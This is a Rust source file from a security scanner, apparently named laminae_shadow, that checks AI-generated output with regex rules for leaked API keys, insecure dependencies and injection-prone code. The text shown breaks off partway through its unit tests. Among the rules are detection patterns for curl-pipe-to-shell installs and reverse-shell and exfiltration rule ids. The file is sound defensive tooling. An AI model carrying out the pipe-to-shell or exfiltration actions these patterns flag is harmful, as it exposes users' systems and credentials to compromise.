Skip to main content

laminae_shadow/
analyzer.rs

1use std::borrow::Cow;
2use std::sync::LazyLock;
3
4use regex::Regex;
5use thiserror::Error;
6
7use crate::extractor::ExtractedBlock;
8use crate::report::{AnalysisSource, VulnCategory, VulnFinding, VulnSeverity};
9use crate::scanner;
10
/// Internal error type for individual analyzer stages.
///
/// Each variant has a counterpart in the public [`ShadowError`], and the
/// `From<AnalyzerError>` impl in this module performs that mapping.
#[derive(Error, Debug)]
pub enum AnalyzerError {
    /// The static (pattern-based) stage failed; the payload is the message.
    #[error("Static analysis failed: {0}")]
    Static(String),
    /// The LLM review stage failed; the payload is the message.
    #[error("LLM review failed: {0}")]
    LlmReview(String),
    /// The sandbox stage failed; the payload is the message.
    #[error("Sandbox error: {0}")]
    Sandbox(String),
    /// The analyzer is switched off or cannot run.
    #[error("Analyzer disabled or unavailable")]
    Disabled,
}
23
/// Public error type for the Shadow crate's API surface.
///
/// `StaticAnalysis`, `LlmReview`, `Sandbox` and `Disabled` are produced from
/// the matching [`AnalyzerError`] variants; `Config` and `Internal` have no
/// analyzer-level counterpart in this file.
#[derive(Error, Debug)]
pub enum ShadowError {
    /// The static analysis stage failed.
    #[error("Static analysis failed: {0}")]
    StaticAnalysis(String),
    /// The LLM review stage failed.
    #[error("LLM review failed: {0}")]
    LlmReview(String),
    /// The sandbox stage failed.
    #[error("Sandbox execution failed: {0}")]
    Sandbox(String),
    /// A configuration problem, described by the payload.
    #[error("Configuration error: {0}")]
    Config(String),
    /// The Shadow engine is disabled.
    #[error("Shadow engine is disabled")]
    Disabled,
    /// Any other internal failure, described by the payload.
    #[error("Internal error: {0}")]
    Internal(String),
}
40
41impl From<AnalyzerError> for ShadowError {
42    fn from(err: AnalyzerError) -> Self {
43        match err {
44            AnalyzerError::Static(msg) => ShadowError::StaticAnalysis(msg),
45            AnalyzerError::LlmReview(msg) => ShadowError::LlmReview(msg),
46            AnalyzerError::Sandbox(msg) => ShadowError::Sandbox(msg),
47            AnalyzerError::Disabled => ShadowError::Disabled,
48        }
49    }
50}
51
/// Trait for composable analysis stages.
/// Each implementation is independent, async, and fallible.
///
/// Implement this trait to add custom analysis stages to the Shadow pipeline.
// `async fn` in a public trait triggers the `async_fn_in_trait` lint because
// callers cannot name extra bounds (such as `Send`) on the returned futures.
// The lint is silenced here; NOTE(review): confirm that no caller needs the
// futures to be `Send`.
#[allow(async_fn_in_trait)]
pub trait Analyzer: Send + Sync {
    /// Human-readable name for logging.
    fn name(&self) -> &'static str;

    /// Check if this analyzer can run.
    async fn is_available(&self) -> bool;

    /// Analyze output and return findings.
    ///
    /// `ego_output` is the full text under review and `code_blocks` are the
    /// blocks extracted from it. Returns the findings, or an
    /// [`AnalyzerError`] if the stage fails.
    async fn analyze(
        &self,
        ego_output: &str,
        code_blocks: &[ExtractedBlock],
    ) -> Result<Vec<VulnFinding>, AnalyzerError>;
}
71
/// Static pattern-based analyzer with vulnerability detection rules.
///
/// The built-in rules live in a shared static; this struct only stores the
/// additional, caller-supplied rules.
pub struct StaticAnalyzer {
    /// Caller-supplied rules, already compiled, applied after the built-in ones.
    extra_rules: Vec<CompiledShadowRule>,
}
76
/// A user-defined vulnerability detection rule for the static analyzer.
///
/// All string fields accept both `&'static str` (for compile-time rules)
/// and `String` (for rules loaded from config at runtime) via `Cow`.
pub struct ShadowRule {
    /// Unique identifier for the rule.
    ///
    /// Note: `StaticAnalyzer::with_extra_rules` does not copy this field into
    /// the compiled rule, so it does not appear in findings.
    pub id: Cow<'static, str>,
    /// Vulnerability category this rule detects.
    pub category: VulnCategory,
    /// Severity level of findings from this rule.
    pub severity: VulnSeverity,
    /// Regex pattern to match against code (compiled with the `regex` crate).
    pub pattern: Cow<'static, str>,
    /// Short title for findings.
    pub title: Cow<'static, str>,
    /// Detailed description of the vulnerability.
    pub description: Cow<'static, str>,
    /// CWE identifier, if applicable.
    pub cwe: Option<u32>,
    /// Suggested remediation.
    pub remediation: Cow<'static, str>,
}
99
/// Pre-compiled form of a static-analyzer rule.
///
/// Built-in rules are compiled once behind a `LazyLock`; user-supplied
/// `ShadowRule`s are compiled in `StaticAnalyzer::with_extra_rules`.
struct CompiledShadowRule {
    /// Category copied onto each finding.
    category: VulnCategory,
    /// Severity copied onto each finding.
    severity: VulnSeverity,
    /// Compiled detection pattern.
    regex: Regex,
    /// Finding title.
    title: Cow<'static, str>,
    /// Finding description (the analyzer prefixes it with the text's label).
    description: Cow<'static, str>,
    /// CWE identifier, if any.
    cwe: Option<u32>,
    /// Suggested remediation.
    remediation: Cow<'static, str>,
}
110
/// Analyzer for dependency-related vulnerabilities in code output.
///
/// Flags insecure package sources, packages with a supply-chain compromise
/// history, very old version pins, and pipe-to-shell install commands that
/// an LLM might suggest.
///
/// The analyzer is a stateless unit struct, so it is cheap to copy and can
/// be printed with `{:?}` in logs.
#[derive(Debug, Clone, Copy, Default)]
pub struct DependencyAnalyzer;

impl DependencyAnalyzer {
    /// Creates the analyzer. Equivalent to `DependencyAnalyzer::default()`.
    #[must_use]
    pub const fn new() -> Self {
        Self
    }
}
128
/// Source-level definition of one dependency rule (see `DEP_RULES`).
struct DepRule {
    /// Regex source text, compiled lazily into a `CompiledDepRule`.
    pattern: &'static str,
    /// Finding title.
    title: &'static str,
    /// Finding description.
    description: &'static str,
    /// Severity assigned to findings from this rule.
    severity: VulnSeverity,
    /// Category assigned to findings from this rule.
    category: VulnCategory,
    /// CWE identifier, if any.
    cwe: Option<u32>,
    /// Suggested remediation.
    remediation: &'static str,
}
138
/// Pre-compiled version of DepRule.
///
/// Carries the same metadata as `DepRule`, with the pattern replaced by its
/// compiled `Regex`.
struct CompiledDepRule {
    /// Compiled detection pattern.
    regex: Regex,
    /// Finding title.
    title: &'static str,
    /// Finding description.
    description: &'static str,
    /// Severity assigned to findings from this rule.
    severity: VulnSeverity,
    /// Category assigned to findings from this rule.
    category: VulnCategory,
    /// CWE identifier, if any.
    cwe: Option<u32>,
    /// Suggested remediation.
    remediation: &'static str,
}
149
150const DEP_RULES: &[DepRule] = &[
151    DepRule {
152        pattern: r#"(pip|pip3)\s+install\s+--index-url\s+http://"#,
153        title: "Insecure package index (HTTP)",
154        description: "Installing packages from an unencrypted HTTP source enables MITM attacks.",
155        severity: VulnSeverity::High,
156        category: VulnCategory::DataExfiltration,
157        cwe: Some(829),
158        remediation: "Always use HTTPS for package indices.",
159    },
160    DepRule {
161        pattern: r#"npm\s+install\s+--ignore-scripts\s+false"#,
162        title: "NPM install with scripts enabled explicitly",
163        description:
164            "Enabling install scripts on untrusted packages risks arbitrary code execution.",
165        severity: VulnSeverity::Medium,
166        category: VulnCategory::CommandInjection,
167        cwe: Some(829),
168        remediation: "Audit packages before enabling install scripts.",
169    },
170    DepRule {
171        pattern: r#"(event-stream|ua-parser-js|coa|rc|colors)\b.*\d+\.\d+\.\d+"#,
172        title: "Previously compromised NPM package",
173        description:
174            "This package has a known supply chain attack history. Verify the version is safe.",
175        severity: VulnSeverity::High,
176        category: VulnCategory::AdversarialLogic,
177        cwe: Some(506),
178        remediation: "Pin to a verified safe version and audit the package.",
179    },
180    DepRule {
181        pattern: r#"(urllib3|requests|django|flask|lodash|express)\s*[<>=]+\s*[\d.]+.*\b(0\.\d|1\.[0-5]\.)"#,
182        title: "Potentially outdated dependency version",
183        description: "Very old versions of popular packages often contain known vulnerabilities.",
184        severity: VulnSeverity::Medium,
185        category: VulnCategory::LogicFlaw,
186        cwe: Some(1104),
187        remediation: "Update to the latest stable version.",
188    },
189    DepRule {
190        pattern: r#"curl\s+.*\|\s*(sh|bash|python|node)"#,
191        title: "Pipe-to-shell installation",
192        description: "Downloading and executing scripts in one step bypasses all verification.",
193        severity: VulnSeverity::Critical,
194        category: VulnCategory::CommandInjection,
195        cwe: Some(829),
196        remediation: "Download first, verify checksum/signature, then execute.",
197    },
198    DepRule {
199        pattern: r#"(git\+http://|git://)[^\s]+"#,
200        title: "Git dependency over unencrypted protocol",
201        description: "Git dependencies over HTTP or git:// are vulnerable to MITM.",
202        severity: VulnSeverity::Medium,
203        category: VulnCategory::DataExfiltration,
204        cwe: Some(319),
205        remediation: "Use HTTPS or SSH for git dependencies.",
206    },
207];
208
209impl Analyzer for DependencyAnalyzer {
210    fn name(&self) -> &'static str {
211        "dependency"
212    }
213    async fn is_available(&self) -> bool {
214        true
215    }
216
217    async fn analyze(
218        &self,
219        ego_output: &str,
220        code_blocks: &[ExtractedBlock],
221    ) -> Result<Vec<VulnFinding>, AnalyzerError> {
222        let mut findings = Vec::new();
223        let compiled = &*COMPILED_DEP_RULES;
224
225        let targets: Vec<&str> = std::iter::once(ego_output)
226            .chain(code_blocks.iter().map(|b| b.content.as_str()))
227            .collect();
228
229        for text in &targets {
230            for rule in compiled {
231                for mat in rule.regex.find_iter(text) {
232                    let line_num = text[..mat.start()].matches('\n').count() + 1;
233                    findings.push(VulnFinding {
234                        id: generate_finding_id(),
235                        category: rule.category,
236                        severity: rule.severity,
237                        title: rule.title.to_string(),
238                        description: rule.description.to_string(),
239                        evidence: truncate_evidence(mat.as_str()),
240                        line: Some(line_num),
241                        cwe: rule.cwe,
242                        remediation: rule.remediation.to_string(),
243                        source: AnalysisSource::Static,
244                    });
245                }
246            }
247        }
248
249        Ok(findings)
250    }
251}
252
/// Analyzer for secrets and credentials leaked in AI output.
///
/// Goes beyond simple password detection — catches API keys, tokens,
/// connection strings, and cloud credentials with format-specific patterns.
///
/// The analyzer is a stateless unit struct, so it is cheap to copy and can
/// be printed with `{:?}` in logs.
#[derive(Debug, Clone, Copy, Default)]
pub struct SecretsAnalyzer;

impl SecretsAnalyzer {
    /// Creates the analyzer. Equivalent to `SecretsAnalyzer::default()`.
    #[must_use]
    pub const fn new() -> Self {
        Self
    }
}
270
/// Source-level definition of one secret-detection rule (see `SECRET_RULES`).
///
/// Category, CWE and description are not stored per rule; the analyzer fills
/// them in with fixed values for every secret finding.
struct SecretRule {
    /// Regex source text, compiled lazily into a `CompiledSecretRule`.
    pattern: &'static str,
    /// Finding title naming the kind of credential.
    title: &'static str,
    /// Severity assigned to findings from this rule.
    severity: VulnSeverity,
    /// Suggested remediation.
    remediation: &'static str,
}
277
/// Pre-compiled version of SecretRule.
///
/// Carries the same metadata as `SecretRule`, with the pattern replaced by
/// its compiled `Regex`.
struct CompiledSecretRule {
    /// Compiled detection pattern.
    regex: Regex,
    /// Finding title naming the kind of credential.
    title: &'static str,
    /// Severity assigned to findings from this rule.
    severity: VulnSeverity,
    /// Suggested remediation.
    remediation: &'static str,
}
285
/// Built-in secret-detection rules, applied in this order by `SecretsAnalyzer`.
///
/// Each pattern encodes the fixed prefix and length of one credential format.
const SECRET_RULES: &[SecretRule] = &[
    // `ghp_` followed by exactly 36 alphanumerics.
    SecretRule {
        pattern: r#"ghp_[0-9a-zA-Z]{36}"#,
        title: "GitHub personal access token",
        severity: VulnSeverity::Critical,
        remediation:
            "Revoke the token at github.com/settings/tokens and use environment variables.",
    },
    // `sk-`, 20 alphanumerics, the literal `T3BlbkFJ`, then 20 alphanumerics.
    SecretRule {
        pattern: r#"sk-[a-zA-Z0-9]{20}T3BlbkFJ[a-zA-Z0-9]{20}"#,
        title: "OpenAI API key",
        severity: VulnSeverity::Critical,
        remediation: "Rotate the key at platform.openai.com/api-keys.",
    },
    // `sk-ant-api` followed by at least 80 key characters.
    SecretRule {
        pattern: r#"sk-ant-api[a-zA-Z0-9_-]{80,}"#,
        title: "Anthropic API key",
        severity: VulnSeverity::Critical,
        remediation: "Rotate the key at console.anthropic.com/settings/keys.",
    },
    // `xoxb-`, `xoxp-`, `xoxo-`, `xoxa-` or `xoxs-` plus at least 10 characters.
    SecretRule {
        pattern: r#"xox[bpoas]-[0-9a-zA-Z-]{10,}"#,
        title: "Slack token",
        severity: VulnSeverity::Critical,
        remediation: "Revoke and regenerate the token in your Slack app settings.",
    },
    // `mongodb://` or `mongodb+srv://` URL with a `user:password@` section.
    SecretRule {
        pattern: r#"(mongodb(\+srv)?://)[^\s"']+:[^\s"']+@"#,
        title: "MongoDB connection string with credentials",
        severity: VulnSeverity::Critical,
        remediation: "Use environment variables for database connection strings.",
    },
    // postgres/postgresql/mysql/mssql URL with a `user:password@` section.
    SecretRule {
        pattern: r#"(postgres(ql)?|mysql|mssql)://[^\s"']+:[^\s"']+@"#,
        title: "Database connection string with credentials",
        severity: VulnSeverity::Critical,
        remediation: "Use environment variables for database connection strings.",
    },
    // Three dot-separated segments of 20+ characters, the first two starting
    // with `eyJ`.
    SecretRule {
        pattern: r#"(eyJ[a-zA-Z0-9_-]{20,}\.eyJ[a-zA-Z0-9_-]{20,}\.[a-zA-Z0-9_-]{20,})"#,
        title: "JWT token in code",
        severity: VulnSeverity::High,
        remediation: "Never hardcode JWT tokens. Generate them at runtime.",
    },
    // `SG.` + 22 characters + `.` + 43 characters.
    SecretRule {
        pattern: r#"SG\.[a-zA-Z0-9_-]{22}\.[a-zA-Z0-9_-]{43}"#,
        title: "SendGrid API key",
        severity: VulnSeverity::Critical,
        remediation: "Revoke and rotate the key in SendGrid dashboard.",
    },
    // `sk_live_` followed by at least 24 alphanumerics.
    SecretRule {
        pattern: r#"sk_live_[0-9a-zA-Z]{24,}"#,
        title: "Stripe live secret key",
        severity: VulnSeverity::Critical,
        remediation: "Rotate immediately at dashboard.stripe.com/apikeys.",
    },
    // `AIza` followed by exactly 35 key characters.
    SecretRule {
        pattern: r#"AIza[0-9A-Za-z_-]{35}"#,
        title: "Google API key",
        severity: VulnSeverity::High,
        remediation: "Restrict or rotate the key in Google Cloud Console.",
    },
];
349
350/// Pre-compiled regexes for DEP_RULES. Built once on first access.
351static COMPILED_DEP_RULES: LazyLock<Vec<CompiledDepRule>> = LazyLock::new(|| {
352    DEP_RULES
353        .iter()
354        .filter_map(|rule| {
355            Regex::new(rule.pattern).ok().map(|regex| CompiledDepRule {
356                regex,
357                title: rule.title,
358                description: rule.description,
359                severity: rule.severity,
360                category: rule.category,
361                cwe: rule.cwe,
362                remediation: rule.remediation,
363            })
364        })
365        .collect()
366});
367
368/// Pre-compiled regexes for SECRET_RULES. Built once on first access.
369static COMPILED_SECRET_RULES: LazyLock<Vec<CompiledSecretRule>> = LazyLock::new(|| {
370    SECRET_RULES
371        .iter()
372        .filter_map(|rule| {
373            Regex::new(rule.pattern)
374                .ok()
375                .map(|regex| CompiledSecretRule {
376                    regex,
377                    title: rule.title,
378                    severity: rule.severity,
379                    remediation: rule.remediation,
380                })
381        })
382        .collect()
383});
384
385impl Analyzer for SecretsAnalyzer {
386    fn name(&self) -> &'static str {
387        "secrets"
388    }
389    async fn is_available(&self) -> bool {
390        true
391    }
392
393    async fn analyze(
394        &self,
395        ego_output: &str,
396        code_blocks: &[ExtractedBlock],
397    ) -> Result<Vec<VulnFinding>, AnalyzerError> {
398        let mut findings = Vec::new();
399        let compiled = &*COMPILED_SECRET_RULES;
400
401        let targets: Vec<&str> = std::iter::once(ego_output)
402            .chain(code_blocks.iter().map(|b| b.content.as_str()))
403            .collect();
404
405        for text in &targets {
406            for rule in compiled {
407                for mat in rule.regex.find_iter(text) {
408                    let line_num = text[..mat.start()].matches('\n').count() + 1;
409                    // Redact the actual secret in evidence
410                    let evidence = redact_secret(mat.as_str());
411                    findings.push(VulnFinding {
412                        id: generate_finding_id(),
413                        category: VulnCategory::HardcodedSecret,
414                        severity: rule.severity,
415                        title: rule.title.to_string(),
416                        description: "Credential or secret found in AI output.".to_string(),
417                        evidence,
418                        line: Some(line_num),
419                        cwe: Some(798),
420                        remediation: rule.remediation.to_string(),
421                        source: AnalysisSource::Static,
422                    });
423                }
424            }
425        }
426
427        Ok(findings)
428    }
429}
430
/// Redact the middle of a secret, keeping only a short prefix (and, for
/// longer values, a short suffix) for identification.
///
/// * Up to 10 characters: the first 4 characters followed by `***`.
/// * Longer: the first 8 characters, `***`, then the last 4 characters.
///
/// Lengths are counted in characters rather than bytes, so input containing
/// multi-byte UTF-8 (possible in connection-string matches) cannot cause a
/// slice to land inside a character and panic. ASCII input produces the same
/// output as byte-based slicing would.
fn redact_secret(s: &str) -> String {
    const SHORT_LIMIT: usize = 10;
    const SHORT_PREFIX: usize = 4;
    const PREFIX: usize = 8;
    const SUFFIX: usize = 4;

    if s.chars().count() <= SHORT_LIMIT {
        let prefix: String = s.chars().take(SHORT_PREFIX).collect();
        return format!("{prefix}***");
    }

    // Byte offset just past the first `PREFIX` characters.
    let prefix_end = s.char_indices().nth(PREFIX).map_or(s.len(), |(idx, _)| idx);
    // Byte offset where the last `SUFFIX` characters begin.
    let suffix_start = s
        .char_indices()
        .rev()
        .nth(SUFFIX - 1)
        .map_or(0, |(idx, _)| idx);

    format!("{}***{}", &s[..prefix_end], &s[suffix_start..])
}
438
/// Internal rule definition using static strings (for hardcoded rules only).
struct InternalRule {
    /// Rule identifier; not read when the rule is compiled (hence the
    /// leading underscore).
    _id: &'static str,
    /// Category assigned to findings from this rule.
    category: VulnCategory,
    /// Severity assigned to findings from this rule.
    severity: VulnSeverity,
    /// Regex source text, compiled lazily into a `CompiledShadowRule`.
    pattern: &'static str,
    /// Finding title.
    title: &'static str,
    /// Finding description.
    description: &'static str,
    /// CWE identifier, if any.
    cwe: Option<u32>,
    /// Suggested remediation.
    remediation: &'static str,
}
450
451const SHADOW_RULES: &[InternalRule] = &[
452    InternalRule {
453        _id: "sqli-string-concat",
454        category: VulnCategory::SqlInjection,
455        severity: VulnSeverity::Critical,
456        pattern: r#"(SELECT|INSERT|UPDATE|DELETE|DROP)\s+.*\+\s*(user|input|param|req\.|request\.|args)"#,
457        title: "SQL injection via string concatenation",
458        description: "SQL query built by concatenating user-controlled input.",
459        cwe: Some(89),
460        remediation: "Use parameterized queries or an ORM.",
461    },
462    InternalRule {
463        _id: "sqli-format-string",
464        category: VulnCategory::SqlInjection,
465        severity: VulnSeverity::Critical,
466        pattern: r#"(f"|f'|format!\(|\.format\().*(?:SELECT|INSERT|UPDATE|DELETE|DROP)"#,
467        title: "SQL injection via format string",
468        description:
469            "SQL query constructed using format strings with potentially user-controlled values.",
470        cwe: Some(89),
471        remediation: "Use parameterized queries.",
472    },
473    InternalRule {
474        _id: "hardcoded-password",
475        category: VulnCategory::HardcodedSecret,
476        severity: VulnSeverity::High,
477        pattern: r#"(?i)(password|passwd|secret|api_key|apikey|token|auth)\s*=\s*["'][^"']{8,}["']"#,
478        title: "Hardcoded secret or credential",
479        description: "A credential appears to be hardcoded in the source.",
480        cwe: Some(798),
481        remediation: "Use environment variables or a secrets manager.",
482    },
483    InternalRule {
484        _id: "hardcoded-aws-key",
485        category: VulnCategory::HardcodedSecret,
486        severity: VulnSeverity::Critical,
487        pattern: r#"(?:AKIA|ASIA)[0-9A-Z]{16}"#,
488        title: "AWS access key ID detected",
489        description: "An AWS access key ID pattern was found in the code.",
490        cwe: Some(798),
491        remediation: "Remove the key, rotate it in AWS IAM, use IAM roles.",
492    },
493    InternalRule {
494        _id: "hardcoded-private-key",
495        category: VulnCategory::HardcodedSecret,
496        severity: VulnSeverity::Critical,
497        pattern: r#"-----BEGIN (RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----"#,
498        title: "Private key embedded in code",
499        description: "A private key header was found.",
500        cwe: Some(321),
501        remediation: "Remove the key, rotate it, store securely.",
502    },
503    InternalRule {
504        _id: "path-traversal-user-input",
505        category: VulnCategory::PathTraversal,
506        severity: VulnSeverity::High,
507        pattern: r#"(open|read|write|Path|PathBuf|fs\.|os\.path)\s*\(.*\.\.\/"#,
508        title: "Potential path traversal",
509        description: "File operation uses a path containing '../'.",
510        cwe: Some(22),
511        remediation: "Canonicalize paths and verify they remain within allowed directories.",
512    },
513    InternalRule {
514        _id: "xss-innerhtml",
515        category: VulnCategory::XssReflected,
516        severity: VulnSeverity::High,
517        pattern: r#"(innerHTML|outerHTML|document\.write|v-html|dangerouslySetInnerHTML)\s*="#,
518        title: "Potential XSS via unsafe HTML injection",
519        description: "Direct HTML injection that may include unsanitized user input.",
520        cwe: Some(79),
521        remediation: "Use textContent, sanitize HTML with DOMPurify.",
522    },
523    InternalRule {
524        _id: "unsafe-deserialize",
525        category: VulnCategory::InsecureDeserialization,
526        severity: VulnSeverity::High,
527        pattern: r#"(pickle\.loads?|yaml\.load\(|yaml\.unsafe_load|Marshal\.load|unserialize)\s*\("#,
528        title: "Insecure deserialization",
529        description: "Deserializing untrusted data can lead to RCE.",
530        cwe: Some(502),
531        remediation: "Use safe deserialization (yaml.safe_load, JSON).",
532    },
533    InternalRule {
534        _id: "weak-hash-md5",
535        category: VulnCategory::CryptoWeakness,
536        severity: VulnSeverity::Medium,
537        pattern: r#"(?i)(md5|sha1)\s*[.(]"#,
538        title: "Weak hash algorithm",
539        description: "MD5 and SHA-1 are cryptographically broken.",
540        cwe: Some(328),
541        remediation: "Use SHA-256 or better.",
542    },
543    InternalRule {
544        _id: "infinite-loop-risk",
545        category: VulnCategory::ResourceAbuse,
546        severity: VulnSeverity::Medium,
547        pattern: r#"while\s*\(\s*(true|1|True)\s*\)"#,
548        title: "Potential infinite loop",
549        description: "Unbounded loop that may consume CPU indefinitely.",
550        cwe: Some(835),
551        remediation: "Add a maximum iteration count or timeout.",
552    },
553];
554
555/// Pre-compiled regexes for SHADOW_RULES. Built once on first access.
556static COMPILED_SHADOW_RULES: LazyLock<Vec<CompiledShadowRule>> = LazyLock::new(|| {
557    SHADOW_RULES
558        .iter()
559        .filter_map(|rule| {
560            Regex::new(rule.pattern)
561                .ok()
562                .map(|regex| CompiledShadowRule {
563                    category: rule.category,
564                    severity: rule.severity,
565                    regex,
566                    title: Cow::Borrowed(rule.title),
567                    description: Cow::Borrowed(rule.description),
568                    cwe: rule.cwe,
569                    remediation: Cow::Borrowed(rule.remediation),
570                })
571        })
572        .collect()
573});
574
575impl StaticAnalyzer {
576    pub fn new() -> Self {
577        Self {
578            extra_rules: Vec::new(),
579        }
580    }
581
582    /// Create a static analyzer with additional custom rules.
583    ///
584    /// Returns an error if any rule's pattern is an invalid regex.
585    pub fn with_extra_rules(rules: Vec<ShadowRule>) -> Result<Self, regex::Error> {
586        let mut compiled = Vec::with_capacity(rules.len());
587        for rule in rules {
588            let regex = Regex::new(&rule.pattern)?;
589            compiled.push(CompiledShadowRule {
590                category: rule.category,
591                severity: rule.severity,
592                regex,
593                title: rule.title,
594                description: rule.description,
595                cwe: rule.cwe,
596                remediation: rule.remediation,
597            });
598        }
599        Ok(Self {
600            extra_rules: compiled,
601        })
602    }
603}
604
605impl Default for StaticAnalyzer {
606    fn default() -> Self {
607        Self::new()
608    }
609}
610
611impl Analyzer for StaticAnalyzer {
612    fn name(&self) -> &'static str {
613        "static"
614    }
615    async fn is_available(&self) -> bool {
616        true
617    }
618
619    async fn analyze(
620        &self,
621        ego_output: &str,
622        code_blocks: &[ExtractedBlock],
623    ) -> Result<Vec<VulnFinding>, AnalyzerError> {
624        let mut findings = Vec::new();
625
626        // Stage 1: Run embedded scanner on each code block
627        for block in code_blocks {
628            let filename = format!("output.{}", block.language.as_deref().unwrap_or("txt"));
629            let scan_findings = scanner::scan_content(&filename, &block.content);
630
631            for sf in scan_findings {
632                findings.push(VulnFinding {
633                    id: generate_finding_id(),
634                    category: map_scanner_category(&sf.rule_id),
635                    severity: map_scanner_severity(sf.severity),
636                    title: sf.message.clone(),
637                    description: sf.message,
638                    evidence: sf.evidence,
639                    line: Some(sf.line),
640                    cwe: None,
641                    remediation: "Review and fix the flagged pattern.".to_string(),
642                    source: AnalysisSource::Static,
643                });
644            }
645        }
646
647        // Stage 2: Shadow-specific rules on full output + code blocks
648        let compiled = &*COMPILED_SHADOW_RULES;
649        let targets: Vec<(&str, &str)> = std::iter::once(("output", ego_output))
650            .chain(code_blocks.iter().map(|b| {
651                let lang = b.language.as_deref().unwrap_or("code");
652                (lang, b.content.as_str())
653            }))
654            .collect();
655
656        let all_rules = compiled.iter().chain(self.extra_rules.iter());
657
658        for (source_name, text) in &targets {
659            for rule in all_rules.clone() {
660                for mat in rule.regex.find_iter(text) {
661                    let line_num = text[..mat.start()].matches('\n').count() + 1;
662                    let evidence = truncate_evidence(mat.as_str());
663
664                    findings.push(VulnFinding {
665                        id: generate_finding_id(),
666                        category: rule.category,
667                        severity: rule.severity,
668                        title: rule.title.to_string(),
669                        description: format!("[{}] {}", source_name, rule.description),
670                        evidence,
671                        line: Some(line_num),
672                        cwe: rule.cwe,
673                        remediation: rule.remediation.to_string(),
674                        source: AnalysisSource::Static,
675                    });
676                }
677            }
678        }
679
680        // Deduplicate (by category + title + evidence to avoid collapsing different rules)
681        findings.sort_by(|a, b| {
682            a.category
683                .to_string()
684                .cmp(&b.category.to_string())
685                .then(a.title.cmp(&b.title))
686                .then(a.evidence.cmp(&b.evidence))
687        });
688        findings.dedup_by(|a, b| {
689            a.category == b.category && a.title == b.title && a.evidence == b.evidence
690        });
691
692        Ok(findings)
693    }
694}
695
696fn map_scanner_severity(sev: scanner::Severity) -> VulnSeverity {
697    match sev {
698        scanner::Severity::Info => VulnSeverity::Low,
699        scanner::Severity::Warn => VulnSeverity::Medium,
700        scanner::Severity::Critical => VulnSeverity::High,
701    }
702}
703
704fn map_scanner_category(rule_id: &str) -> VulnCategory {
705    if rule_id.contains("eval") || rule_id.contains("exec") || rule_id.contains("spawn") {
706        VulnCategory::CommandInjection
707    } else if rule_id.contains("keychain")
708        || rule_id.contains("ssh")
709        || rule_id.contains("password")
710    {
711        VulnCategory::HardcodedSecret
712    } else if rule_id.contains("reverse-shell") || rule_id.contains("crypto-mining") {
713        VulnCategory::DataExfiltration
714    } else if rule_id.contains("sudo") || rule_id.contains("chmod") {
715        VulnCategory::PrivilegeEscalation
716    } else if rule_id.contains("curl") || rule_id.contains("webhook") || rule_id.contains("dns") {
717        VulnCategory::DataExfiltration
718    } else if rule_id.contains("base64") || rule_id.contains("hex") || rule_id.contains("char-code")
719    {
720        VulnCategory::CommandInjection
721    } else {
722        VulnCategory::Unknown
723    }
724}
725
/// Trims surrounding whitespace from `s` and caps the result for reporting.
///
/// Text of at most 150 bytes is returned as is. Longer text is cut to at most
/// 150 bytes and suffixed with `...`. The cut is moved back to the nearest
/// character boundary, so text containing multi-byte UTF-8 cannot cause a
/// slice to land inside a character and panic.
fn truncate_evidence(s: &str) -> String {
    const MAX_EVIDENCE_BYTES: usize = 150;

    let trimmed = s.trim();
    if trimmed.len() <= MAX_EVIDENCE_BYTES {
        return trimmed.to_string();
    }

    // Offset 0 is always a boundary, so this loop terminates.
    let mut cut = MAX_EVIDENCE_BYTES;
    while !trimmed.is_char_boundary(cut) {
        cut -= 1;
    }
    format!("{}...", &trimmed[..cut])
}
734
/// Builds a finding id of the form `shd-<nanos hex>-<sequence hex>`.
///
/// The first part is the wall-clock time in nanoseconds since the Unix epoch
/// (0 if the clock reads earlier than the epoch); the second is a
/// process-wide counter, zero-padded to at least four hex digits.
fn generate_finding_id() -> String {
    use std::sync::atomic::{AtomicU64, Ordering};
    use std::time::{SystemTime, UNIX_EPOCH};

    static NEXT_SEQUENCE: AtomicU64 = AtomicU64::new(0);

    let nanos_since_epoch = match SystemTime::now().duration_since(UNIX_EPOCH) {
        Ok(elapsed) => elapsed.as_nanos(),
        Err(_) => 0,
    };
    let sequence = NEXT_SEQUENCE.fetch_add(1, Ordering::Relaxed);

    format!("shd-{nanos_since_epoch:x}-{sequence:04x}")
}
746
// Unit tests for the three analyzers and the redaction helper. Each analyzer
// test passes an empty `ego_output` and a single code block, so findings come
// only from that block.
#[cfg(test)]
mod tests {
    use super::*;

    // Builds a code block with the given language tag and content.
    fn make_block(lang: &str, content: &str) -> ExtractedBlock {
        ExtractedBlock {
            language: Some(lang.to_string()),
            content: content.to_string(),
            char_offset: 0,
        }
    }

    // String concatenation of `user_input` into a SELECT is reported as SQL injection.
    #[tokio::test]
    async fn test_detects_sql_injection() {
        let analyzer = StaticAnalyzer::new();
        let blocks = vec![make_block(
            "python",
            r#"query = "SELECT * FROM users WHERE id = " + user_input"#,
        )];
        let findings = analyzer.analyze("", &blocks).await.unwrap();
        assert!(findings
            .iter()
            .any(|f| f.category == VulnCategory::SqlInjection));
    }

    // A quoted literal assigned to `password` is reported as a hardcoded secret.
    #[tokio::test]
    async fn test_detects_hardcoded_password() {
        let analyzer = StaticAnalyzer::new();
        let blocks = vec![make_block(
            "python",
            r#"password = "supersecretpassword123""#,
        )];
        let findings = analyzer.analyze("", &blocks).await.unwrap();
        assert!(findings
            .iter()
            .any(|f| f.category == VulnCategory::HardcodedSecret));
    }

    // Harmless code yields no findings from either the scanner or the rules.
    #[tokio::test]
    async fn test_clean_code() {
        let analyzer = StaticAnalyzer::new();
        let blocks = vec![make_block(
            "rust",
            "fn greet() -> String { \"hello\".to_string() }",
        )];
        let findings = analyzer.analyze("", &blocks).await.unwrap();
        assert!(findings.is_empty());
    }

    // Assignment to `innerHTML` is reported as XSS.
    #[tokio::test]
    async fn test_detects_xss() {
        let analyzer = StaticAnalyzer::new();
        let blocks = vec![make_block("js", "element.innerHTML = userInput;")];
        let findings = analyzer.analyze("", &blocks).await.unwrap();
        assert!(findings
            .iter()
            .any(|f| f.category == VulnCategory::XssReflected));
    }

    // None of the built-in regex rules targets `eval`, so a finding here is
    // expected to come from the embedded scanner pass.
    #[tokio::test]
    async fn test_detects_eval_via_scanner() {
        let analyzer = StaticAnalyzer::new();
        let blocks = vec![make_block("js", "eval(userInput);")];
        let findings = analyzer.analyze("", &blocks).await.unwrap();
        assert!(!findings.is_empty());
    }

    // ── DependencyAnalyzer tests ──

    // `curl ... | bash` is reported as a pipe-to-shell install.
    #[tokio::test]
    async fn test_dep_detects_pipe_to_shell() {
        let analyzer = DependencyAnalyzer::new();
